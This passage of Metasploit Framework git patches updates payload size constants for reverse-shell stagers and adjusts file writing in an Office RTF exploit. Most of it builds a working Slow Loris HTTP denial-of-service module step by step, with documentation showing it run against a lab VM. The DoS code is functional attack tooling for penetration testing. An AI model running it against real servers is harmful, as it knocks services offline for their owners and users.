b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index 635afb61ca..70521e2055 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/bind_tcp' module MetasploitModule - CachedSize = 5118 + CachedSize = 5303 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index 2d1498c7d5..8f011c61f2 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_http' module MetasploitModule - CachedSize = 5123 + CachedSize = 5386 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index d276ea2d52..a58aa42357 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/java/reverse_https' module MetasploitModule - CachedSize = 5932 + CachedSize = 6195 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index 5ad61693af..4f5110192a 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_tcp' module MetasploitModule - CachedSize = 5118 + CachedSize = 5303 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 2b58ea764b..819f4848b9 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_http' module MetasploitModule - CachedSize = 339 + CachedSize = 347 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 907fa651de..31e6d29a13 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_https' module MetasploitModule - CachedSize = 359 + CachedSize = 367 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index ba77689d2a..f79ba8c95d 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https_proxy' module MetasploitModule - CachedSize = 397 + CachedSize = 384 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb index eb634588de..fd0d496261 100644 --- a/modules/payloads/stagers/windows/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/reverse_winhttp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttp' module MetasploitModule - CachedSize = 357 + CachedSize = 520 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb index a7784e0c4c..07726c00c3 100644 --- a/modules/payloads/stagers/windows/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/reverse_winhttps.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttps' module MetasploitModule - CachedSize = 377 + CachedSize = 542 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index 6a2686cc83..624fc33a65 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_http' module MetasploitModule - CachedSize = 520 + CachedSize = 529 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index d11003e5f5..7cee13664a 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_https' module MetasploitModule - CachedSize = 551 + CachedSize = 563 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index 3ee66da58d..3571790029 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttp' module MetasploitModule - CachedSize = 532 + CachedSize = 746 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb index 0a70268db0..2ed98e3f61 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttps' module MetasploitModule - CachedSize = 563 + CachedSize = 782 include Msf::Payload::Stager include Msf::Payload::Windows From fcea6fd8d4af65ee9f308c5e149caf294d5a4eb9 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 15:00:06 -0500 Subject: [PATCH 181/254] actually create new file ;-; --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index e5f44235ec..83995534f2 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -134,10 +134,10 @@ class MetasploitModule < Msf::Exploit::Remote payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - rtf = File.new(datastore['FILENAME'], 'w') - rtf.write(payload) - rtf.close - rtf + ::File.open(datastore['FILENAME'], 'wb') do |fd| + fd.write(payload) + fd.close + end end From a7932ffe0e36f913d4bfbe2a0ccfc7bb42730fa0 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 21 Nov 2017 14:31:14 -0600 Subject: [PATCH 182/254] fix sizes --- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index 3a5b484828..d1749f9c25 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1029776 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index bc464ffbc7..bc1d3f2c08 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1029776 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index a01c6f9db5..cc021b9ff2 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1029776 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions From f79b41edde1db4d5982c54dd768818d5292ad6ca Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 31 Oct 2017 16:30:09 +0000 Subject: [PATCH 183/254] Slow Loris --- modules/auxiliary/dos/http/slow_loris.rb | 71 ++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 modules/auxiliary/dos/http/slow_loris.rb diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb new file mode 100644 index 0000000000..14f38175b0 --- /dev/null +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -0,0 +1,71 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Slow Loris DoS', + 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + It accomplishes this by opening connections to the target web server and sending a partial request. + Periodically, it will send subsequent requests, adding to—but never completing—the request.}, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'RSnake', # Vulnerability disclosure + 'Daniel Teixeira' # Metasploit module + ], + 'References' => + [ + ['URL', 'https://www.exploit-db.com/exploits/8976/'] + ], + )) + + register_options( + [ + Opt::RPORT(80), + OptInt.new('THREADS', [true, 'The number of concurrent threads', 5000]), + OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 60]) + ]) + end + + def thread_count + datastore['THREADS'] + end + + def timeout + datastore['TIMEOUT'] + end + + def run + + starting_thread = 1 + while true do + ubound = [thread_count].min + print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") + + threads = [] + 1.upto(ubound) do |i| + threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| + begin + connect() + header = "GET / HTTP/1.1\r\n" + sock.puts(header) + sleep rand(1..15) + data = "X-a-#{rand(0..1000)}: b\r\n" + sock.puts(data) + end + end + end + + threads.each(&:join) + print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") + starting_thread += ubound + end + end +end From 29017b89267b50721cc961e28dfd719ae5e2d811 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 1 Nov 2017 10:01:42 +0000 Subject: [PATCH 184/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 14f38175b0..2e7c0939f4 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Slow Loris DoS', 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. - Periodically, it will send subsequent requests, adding to—but never completing—the request.}, + Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, 'Author' => [ @@ -22,7 +22,9 @@ class MetasploitModule < Msf::Auxiliary ], 'References' => [ - ['URL', 'https://www.exploit-db.com/exploits/8976/'] + [ 'CVE', '2007-6750' ], + [ 'CVE', '2010-2227' ], + [ 'URL', 'https://www.exploit-db.com/exploits/8976/' ] ], )) @@ -56,9 +58,11 @@ class MetasploitModule < Msf::Auxiliary connect() header = "GET / HTTP/1.1\r\n" sock.puts(header) - sleep rand(1..15) - data = "X-a-#{rand(0..1000)}: b\r\n" - sock.puts(data) + 10.times do + data = "X-a-#{rand(0..1000)}: b\r\n" + sock.puts(data) + sleep rand(1..15) + end end end end From 9457359b11606662a787f54827d573fe67341bf8 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 2 Nov 2017 14:02:59 +0000 Subject: [PATCH 185/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 2e7c0939f4..ee5f023550 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -45,8 +45,9 @@ class MetasploitModule < Msf::Auxiliary end def run - starting_thread = 1 + header = "GET / HTTP/1.1\r\n" + while true do ubound = [thread_count].min print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") @@ -56,7 +57,6 @@ class MetasploitModule < Msf::Auxiliary threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin connect() - header = "GET / HTTP/1.1\r\n" sock.puts(header) 10.times do data = "X-a-#{rand(0..1000)}: b\r\n" From 60878215e0a48f0d7ae8c480d1b9af84de5477a9 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Fri, 3 Nov 2017 11:11:20 +0000 Subject: [PATCH 186/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index ee5f023550..afef986f49 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -47,12 +47,12 @@ class MetasploitModule < Msf::Auxiliary def run starting_thread = 1 header = "GET / HTTP/1.1\r\n" + threads = [] while true do ubound = [thread_count].min print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") - - threads = [] + 1.upto(ubound) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin @@ -66,9 +66,7 @@ class MetasploitModule < Msf::Auxiliary end end end - threads.each(&:join) - print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") starting_thread += ubound end end From 21a6d0bd6ea13fbe0441b6b60b846aee08eb9306 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Fri, 3 Nov 2017 18:14:47 +0000 Subject: [PATCH 187/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index afef986f49..30b2e7005d 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info( info, 'Name' => 'Slow Loris DoS', - 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, @@ -48,11 +48,11 @@ class MetasploitModule < Msf::Auxiliary starting_thread = 1 header = "GET / HTTP/1.1\r\n" threads = [] - while true do + ubound = [thread_count].min print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") - + 1.upto(ubound) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin From 53123d92e2d79fdb01d93868aaf0d51a2c7a95a2 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Fri, 3 Nov 2017 18:19:12 +0000 Subject: [PATCH 188/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 30b2e7005d..1897c11b1a 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => 'Slow Loris DoS', 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. + It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, 'Author' => From 4419c0d85180eded7562221d1464d87946b19fbd Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 7 Nov 2017 20:51:26 +0000 Subject: [PATCH 189/254] Create slow_loris.md --- .../modules/auxiliary/dos/http/slow_loris.md | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/http/slow_loris.md diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md new file mode 100644 index 0000000000..06a7846e08 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md @@ -0,0 +1,43 @@ +Vulnerable Application + +This module tries to keep many connections to the target web server open and hold them open as long as possible. + +Vulnerable app versions include: + +- Apache HTTP Server 1.x and 2.x +- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta + +Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + +Verification Steps + +1. Start msfconsole +2. Do: use auxiliary/dos/http/slow_loris +3. Do: set RHOST +4. Do: run +5. Visit server URL in your web-browser. + +Scenarios + +Apache/2.2.8 - Ubuntu 8.04 + +``` +msf > use auxiliary/dos/http/slow_loris.rb +msf auxiliary(slow_loris) > show options + +Module options (auxiliary/dos/http/slow_loris): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.216.129 yes The target address + RPORT 80 yes The target port (TCP) + THREADS 5000 yes The number of concurrent threads + TIMEOUT 60 yes The maximum time in seconds to wait for each request to finish + +msf auxiliary(slow_loris) > set RHOST 192.168.216.129 +RHOST => 192.168.216.129 +msf auxiliary(slow_loris) > run + +[*] 192.168.216.129:80 - Executing requests 1 - 5000... + +``` From fbb9e9d47351b633ea9f2e40049e8293b65677e8 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 7 Nov 2017 20:53:06 +0000 Subject: [PATCH 190/254] Update slow_loris.md --- documentation/modules/auxiliary/dos/http/slow_loris.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md index 06a7846e08..b7af5c00e4 100644 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md @@ -1,4 +1,4 @@ -Vulnerable Application +## Vulnerable Application This module tries to keep many connections to the target web server open and hold them open as long as possible. @@ -9,7 +9,7 @@ Vulnerable app versions include: Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). -Verification Steps +## Verification Steps 1. Start msfconsole 2. Do: use auxiliary/dos/http/slow_loris @@ -17,9 +17,9 @@ Verification Steps 4. Do: run 5. Visit server URL in your web-browser. -Scenarios +## Scenarios -Apache/2.2.8 - Ubuntu 8.04 +### Apache/2.2.8 - Ubuntu 8.04 ``` msf > use auxiliary/dos/http/slow_loris.rb From b7bc68c84334fbfb65d24fae2cad57d1434ee561 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 8 Nov 2017 21:55:53 +0000 Subject: [PATCH 191/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 27 ++++++++++++------------ 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 1897c11b1a..3d1a40d4ca 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -11,8 +11,8 @@ class MetasploitModule < Msf::Auxiliary super(update_info( info, 'Name' => 'Slow Loris DoS', - 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. + 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, 'Author' => @@ -31,8 +31,8 @@ class MetasploitModule < Msf::Auxiliary register_options( [ Opt::RPORT(80), - OptInt.new('THREADS', [true, 'The number of concurrent threads', 5000]), - OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 60]) + OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), + OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]) ]) end @@ -40,25 +40,24 @@ class MetasploitModule < Msf::Auxiliary datastore['THREADS'] end - def timeout - datastore['TIMEOUT'] + def headers + datastore['HEADERS'] end def run starting_thread = 1 header = "GET / HTTP/1.1\r\n" threads = [] - while true do - - ubound = [thread_count].min - print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") - - 1.upto(ubound) do |i| + + loop do + print_status("Executing requests #{starting_thread} - #{(starting_thread + [thread_count].min) - 1}...") + + 1.upto([thread_count].min) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin connect() sock.puts(header) - 10.times do + headers.times do data = "X-a-#{rand(0..1000)}: b\r\n" sock.puts(data) sleep rand(1..15) @@ -67,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary end end threads.each(&:join) - starting_thread += ubound + starting_thread += [thread_count].min end end end From 6d2007a4dbb6875642a6138fc857808c4e4e52ad Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 8 Nov 2017 22:04:51 +0000 Subject: [PATCH 192/254] Update slow_loris.md --- .../modules/auxiliary/dos/http/slow_loris.md | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md index b7af5c00e4..0ef5db604d 100644 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md @@ -2,19 +2,19 @@ This module tries to keep many connections to the target web server open and hold them open as long as possible. +To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + Vulnerable app versions include: - Apache HTTP Server 1.x and 2.x - Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta -Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). - ## Verification Steps 1. Start msfconsole -2. Do: use auxiliary/dos/http/slow_loris -3. Do: set RHOST -4. Do: run +2. Do: `use auxiliary/dos/http/slow_loris` +3. Do: `set RHOST` +4. Do: `run` 5. Visit server URL in your web-browser. ## Scenarios @@ -22,22 +22,22 @@ Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sou ### Apache/2.2.8 - Ubuntu 8.04 ``` -msf > use auxiliary/dos/http/slow_loris.rb -msf auxiliary(slow_loris) > show options +msf > use auxiliary/dos/http/slow_loris5 +msf auxiliary(slow_loris5) > show options -Module options (auxiliary/dos/http/slow_loris): +Module options (auxiliary/dos/http/slow_loris5): Name Current Setting Required Description ---- --------------- -------- ----------- - RHOST 192.168.216.129 yes The target address + HEADERS 10 yes The number of custom headers sent by each thread + RHOST yes The target address RPORT 80 yes The target port (TCP) - THREADS 5000 yes The number of concurrent threads - TIMEOUT 60 yes The maximum time in seconds to wait for each request to finish + THREADS 1000 yes The number of concurrent threads -msf auxiliary(slow_loris) > set RHOST 192.168.216.129 +msf auxiliary(slow_loris5) > set RHOST 192.168.216.129 RHOST => 192.168.216.129 -msf auxiliary(slow_loris) > run +msf auxiliary(slow_loris5) > run -[*] 192.168.216.129:80 - Executing requests 1 - 5000... +[*] 192.168.216.129:80 - Executing requests 1 - 1000... ``` From aa16288140892ca046a87457785476ddfcb4116f Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 9 Nov 2017 19:55:28 +0000 Subject: [PATCH 193/254] Update slow_loris.md --- documentation/modules/auxiliary/dos/http/slow_loris.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md index 0ef5db604d..26d66104bf 100644 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md @@ -22,10 +22,10 @@ Vulnerable app versions include: ### Apache/2.2.8 - Ubuntu 8.04 ``` -msf > use auxiliary/dos/http/slow_loris5 -msf auxiliary(slow_loris5) > show options +msf > use auxiliary/dos/http/slow_loris +msf auxiliary(slow_loris) > show options -Module options (auxiliary/dos/http/slow_loris5): +Module options (auxiliary/dos/http/slow_loris): Name Current Setting Required Description ---- --------------- -------- ----------- @@ -34,9 +34,9 @@ Module options (auxiliary/dos/http/slow_loris5): RPORT 80 yes The target port (TCP) THREADS 1000 yes The number of concurrent threads -msf auxiliary(slow_loris5) > set RHOST 192.168.216.129 +msf auxiliary(slow_loris) > set RHOST 192.168.216.129 RHOST => 192.168.216.129 -msf auxiliary(slow_loris5) > run +msf auxiliary(slow_loris) > run [*] 192.168.216.129:80 - Executing requests 1 - 1000... From 74becb69e8e266e11480bb418be37c64d569952e Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 9 Nov 2017 19:58:10 +0000 Subject: [PATCH 194/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 3d1a40d4ca..6aacb93d2d 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => 'Slow Loris DoS', 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. + It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, 'Author' => @@ -32,7 +32,8 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(80), OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), - OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]) + OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]), + OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) ]) end @@ -43,16 +44,20 @@ class MetasploitModule < Msf::Auxiliary def headers datastore['HEADERS'] end + + def timeout + datastore['TIMEOUT'] + end def run starting_thread = 1 header = "GET / HTTP/1.1\r\n" threads = [] - + loop do - print_status("Executing requests #{starting_thread} - #{(starting_thread + [thread_count].min) - 1}...") - - 1.upto([thread_count].min) do |i| + print_status("Executing requests #{starting_thread} - #{(starting_thread + thread_count) - 1}...") + + 1.upto(thread_count) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin connect() @@ -60,13 +65,13 @@ class MetasploitModule < Msf::Auxiliary headers.times do data = "X-a-#{rand(0..1000)}: b\r\n" sock.puts(data) - sleep rand(1..15) + sleep rand(1..timeout) end end end end threads.each(&:join) - starting_thread += [thread_count].min + starting_thread += thread_count end end end From 52f56527d80b1435c85d832f559d967417c6d007 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 9 Nov 2017 20:04:40 +0000 Subject: [PATCH 195/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 6aacb93d2d..d1b38d0377 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ 